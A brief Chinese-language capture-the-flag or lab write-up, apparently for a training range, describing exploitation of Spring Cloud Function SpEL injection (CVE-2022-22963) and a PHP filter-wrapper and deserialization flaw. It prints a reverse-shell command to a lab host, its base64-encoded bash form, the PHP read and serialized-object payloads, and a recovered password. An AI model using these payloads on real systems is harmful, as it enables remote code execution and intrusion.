前言
需要环境可以私聊
C模块:漏洞1
Server-Hun-1--1 172.16.106.248
SpringCloudFunction是SpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。
Spring Cloud Function SpEL(CVE-2022-22963)远程代码执行漏洞
访问URL是报错页面,使用BurpSuite抓包:
构造反弹shell命令并进行base64加密
sh -i >& /dev/tcp/172.16.106.18/1212 0>&1
base64加密
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTA2LjE4LzEyMTIgMD4mMQ==}|{base64,-d}|{bash,-i}修改数据包发包监听
abc@123./
Server-w--2 172.16.106.247
Php反序列化,查看页面
发现要前往那个php这里使用php伪协议来获取内容
/?text=data:text/plain,welcome to the zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php
解码
发现这个不完整把他加上反序列化
执行这个php代码
构造
?text=data:text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
查看源代码发现密码